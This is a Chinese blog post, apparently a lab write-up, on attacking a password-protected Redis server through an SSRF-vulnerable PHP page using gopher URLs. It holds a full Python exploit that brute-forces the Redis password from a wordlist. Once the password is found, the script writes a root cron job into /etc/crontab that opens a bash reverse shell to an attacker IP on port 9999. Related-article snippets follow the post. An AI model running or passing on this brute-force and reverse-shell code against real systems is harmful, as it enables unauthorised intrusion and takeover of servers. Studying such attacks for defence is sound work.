SSRF+Redis认证攻击(暴力破解)

最新推荐文章于 2024-08-11 18:55:22 发布
最新推荐文章于 2024-08-11 18:55:22 发布
阅读量1.3k 收藏 2
点赞数 1
分类专栏: 数据库安全 SSRF 文章标签: redis 数据库 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/115414738
版权
本文详细介绍了如何通过SSRF漏洞结合Redis的认证机制,实现暴力破解并获取远程服务器的Shell。实验中涉及CentOS8上的Redis服务器、Windows10作为跳板机以及Kali Linux作为攻击者。使用了tcpdump、Wireshark等工具进行流量捕获和分析,通过Python脚本实现暴力破解,并构造数据包获取Shell。实验过程清晰,展示了攻击者可能的渗透路径。
摘要由CSDN通过智能技术生成

随风潜入夜,润物细无声。


实验环境

主机角色描述
centos8受害服务器运行redis数据库(含认证密码)
window10跳板服务器含有ssrf漏洞
kali攻击者利用ssrf+redis暴力破解获取centos8的shell

工具:

Redis

nc

wireshark

tcpdump

python3


实验流程

登录redis,设置认证密码:

config set requirepass qianxun
config get requirepass
image-20210403093653675

用kali进行抓包:

tcpdump -i eth0 port 6379 -w redis.pcap

image-20210403094255336

用kali登录,执行认证命令以便获取认证数据包的样本:

image-20210403094236054

抓包成功:

image-20210403094326667

下载redis.pcap文件,并用wireshark进行分析:

image-20210403094403860

image-20210403094604476

构造gopher协议登录redis(要进行url编码)

image-20210403100614398

image-20210403100552328

如图所示,返回两个OK,说明认证成功!

按照这样的思路编写一个脚本,不断替换auth后的字段内容向redis发起请求,从而实现暴力破解。

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib.request
from urllib.parse import quote

url = "http://222.24.28.207/ssrf/curl_exec.php?url="
gopher = "gopher://222.24.28.100:6379/_"

def get_password():
    f = open("password.txt","r")  #打开密码字典
    return f.readlines()

def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder

for password in get_password():
    # 攻击脚本
    data = """
    auth %s
    quit
    """ % password        #不断的用字典中的密码去替换
    # 二次编码
    encoder = encoder_url(encoder_url(data))
    # 生成payload
    payload = url + quote(gopher,'utf-8') + encoder

    # 发起请求
    request = urllib.request.Request(payload)
    response = urllib.request.urlopen(request).read()
    if response.decode().count("+OK") > 1:  #当返回2个OK时,说明密码被成功找出
        print("find password : " + password)

运行脚本:

image-20210403112641899

如图所示,成功暴力破解出redis登录密码。

构造getshell的数据包:

auth qianxun
set mars "\\n* * * * * root bash -i >& /dev/tcp/222.24.28.44/9999  0>&1\\n"
config set dir /etc/
config set dbfilename crontab
save

加入getshell的数据包,并对上面的代码稍加改动,即可形成暴力破解redis密码并且getshell的exp:

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib.request
from urllib.parse import quote

url = "http://222.24.28.207/ssrf/curl_exec.php?url="
gopher = "gopher://222.24.28.100:6379/_"

def get_password():
    f = open("password.txt","r")
    return f.readlines()

def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder

for password in get_password():
    # 攻击脚本
    data = """
    auth %s
    quit
    """ % password        #不断的用字典中的密码去替换
    
    getshell = """
    auth %s
    set mars "\\n* * * * * root bash -i >& /dev/tcp/222.24.28.44/9999  0>&1\\n"
    config set dir /etc/
    config set dbfilename crontab
    save
    quit
    """%password
    # 二次编码
    encoder = encoder_url(encoder_url(data))
    # 生成payload
    payload = url + quote(gopher,'utf-8') + encoder

    # 发起请求
    request = urllib.request.Request(payload)
    response = urllib.request.urlopen(request).read()
    if response.decode().count("+OK") > 1:
        print("find password : " + password)
        #print(getshell)
        encoder_2 = encoder_url(encoder_url(getshell))
        payload_2 = url + quote(gopher,'utf-8')+encoder_2
        #print(payload_2)
        request = urllib.request.Request(payload_2)
        response = urllib.request.urlopen(request).read()
        print("The packet of getshell has been sent!")

运行脚本:

image-20210403115841197

成功反弹shell:

image-20210403115544905

后记

本次实验与之前不同的是,redis数据库有了密码认证,需要自己编写脚本对密码进行暴力破解。本质上还是ssrf与Redis的组合拳,思路与之前相差不大。

0ak1ey
关注
专栏目录
redis密码破解(python使用redis模块)
Focus on k8s and python
12-28 2028
         昨天用socket模块写了个破解redis密码的脚本,今天用Python redis模块在写了个,同一个密码文本,发现redis模块速度明显不如socket模块,代码如下: #!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 18-12-27 下午9:20 # @Site : # @File : ...
ssrf知识点总结
hackzkaq的博客
11-25 1806
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一.ssrf基础知识 ssrf的定义 SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞, 一般情况下,SSRF攻击的目标是外网无法访问的内网系统(正因为请求时由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统)。 ssrf的成因 SSRF漏洞形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。 例如,黑客操
SSRF+Redis组合拳啊哒~
qq_43665434的博客
04-02 1605
SSRF+Redis组合拳 好雨知时节,当春乃发生。(就是有点冷) 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库,且含有redis未授权访问漏洞 window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问获取centos8的shell 工具: Redis nc wireshark tcpdump Redis基础 1、序列化协议 客户端-服务端之间交互的是序列化后的协议数据。在Redis中,协议数据分为
Redis漏洞大全~讲解最全的漏洞利用方法
最新发布
weixin_67832625的博客
08-11 1133
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。漏洞原理。
Java redis 暴力破解漏洞 简单限制用户登录
zhongzih的博客
05-29 337
处理方案 redis 设置对应的缓存有效期为60秒。然后每次登录的时候查询登录失败次数。超过5次不查询数据库,直接返回报错。漏洞名称:暴力破解漏洞。
redis密码破解(Python使用multiprocessing分布式进程)
Focus on k8s and python
12-31 1060
           前面redis密码破解都是在一台机器单进程运行的,于是想如果在多台机器分布式运行,速度会不会快点,用Python的multiprocessing模块的managers子模块写了个破解程序,代码如下:           master端,代码如下: #!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 18-...
血的教训------入侵redis之利用python来破解redis密码
guijianchouxyz的博客
11-27 595
利用强大的python来进行redis的密码破解,过程不亦乐乎,当然也可以用shell脚本,不停的循环密码来撞库也可以实现其他相关联的文章这里使用的是kail系统,主要原因有两点,1、可以吸引下大家,2、上面直接就有python,不用自己安装,当然了,咱这用的是python2也可以,普通的linux服务器上面也有,所以主要的原因就是第一点吧,哈哈哈哈。
ssrf漏洞php代码审计1
m0_55772907的博客
04-30 1103
(1)原理 web服务器经常需要从别的服务器获取数据,比如文件载入、图片拉取、图片识别等功能,如果获取数据的服务器地址可控,攻击者就可以通过web服务器自定义向别的服务器发出请求。因为web服务器常搭建在DMZ区域,因此常被攻击者当作跳板,向内网服务器发出请求。 (2)分类 1)curl_exec 发现存在url传递。在这里提交url参数和内容,服务器用函数curl_exec()执行,并将结果输出 在下面页面做测试发现可以正常跳转,所以可以在此去执行一些恶意操作。 2)file_get_co.
SSRF学习详解与实践
不想当脚本小子的脚本小子
01-24 945
原理:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。注释:除了http/https等方式可以造成ssrf,类
Top10+java类
LCW991207的博客
05-14 991
答:通过前端接口拼接发现信息泄露,包括姓名和手机号等信息,在忘记密码处根据上述信息泄露收集的手机号,对其中一个手机号进行密码修改,获取手机验证码后,任意输入手机验证码,进行抓包,修改响应包参数success为true,放包后显示密码修改成功,密成功登录那个账号的员工后台。服务端提供了能够从其他服务器应用获取数据的功能,我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务,但是如果没有对这个请求的目标地址、文件等做充足的过滤和限制,攻击者可通过篡改这个请求的目标地址来进行伪造请求,进行未授权访问。
红队系列-SRC常用漏洞挖掘技巧
aming小老弟
12-08 1481
安全弱点sql 注入命令 注入深入利用xpath注入 (老式 ) 广泛了解乌云镜像薅羊毛。
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
SSRF攻击Redis
cosmoslin的博客
10-27 1412
Redis简介 Redis数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash(哈希类型)。这些数据类型都支持p
基于SSRF+Redis的内网渗透
weixin_46686336的博客
11-07 722
基于SSRF+Redis的内网渗透
Python3 15行代码破解Redis密码(不提供密码库)
weixin_42366275的博客
01-04 482
文章目录一、所需Python库二、code 一、所需Python库 1.redis(pip install redis) 二、code import redis with open(r'C:\Users\hot\Desktop\密码库.txt', "rb") as passfile: # 读取txt文件 while True: line = passfile.readline() if not line: break
Spring Boot + Redis: 实现密码暴力破解
每天多一点干货
08-13 86
public class Solution { /** * 代码中的类名、方法名、参数名已经指定,请勿修改,public class Solution { /** * 代码中的类名、方法名、参数名已经指定,请勿修改,class Solution { public: /** * 代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可。#晒一晒我的offer# #牛客解忧铺# #牛客在线求职答疑中心# #晒一晒我的offer# #我的求职思考#
redis密码破解(python使用socket模块)
Focus on k8s and python
12-27 1573
         偶尔看到一篇讲述redis未授权访问漏洞的,提到用hydra进行redis密码的破解。测试了下,发现安装的hydra竟然无法破解出密码,且速度很慢(hydra版本 v8.2-dev)。     如上图,用一个for循环生成个随机密码测试文件,将正确密码写入。 如上图,hydra竟然没破解出密码,不知道是不是bug,而且一分钟才运行差不多10000次密码猜测。而redi...
SSRF+redis
08-24
SSRF redis是指通过Server-Side Request Forgery (SSRF)攻击技术利用redis未授权访问漏洞的组合。SSRF漏洞可以让攻击者发送伪造的请求,使服务器在攻击者的控制下发送请求到内部网络或其他外部系统。而redis未授权访问漏洞指的是redis数据库未经任何身份验证就可以被访问和控制的漏洞。通过这两种漏洞的结合,攻击者可以利用SSRF漏洞请求含有未授权访问漏洞的redis,然后通过redis的数据备份功能将恶意代码写入服务器的定时文件中,最终实现反弹shell攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ssrf+redis](https://blog.csdn.net/qq_45213259/article/details/110352124)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [SSRF+Redis组合拳啊哒~](https://blog.csdn.net/qq_43665434/article/details/115408269)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值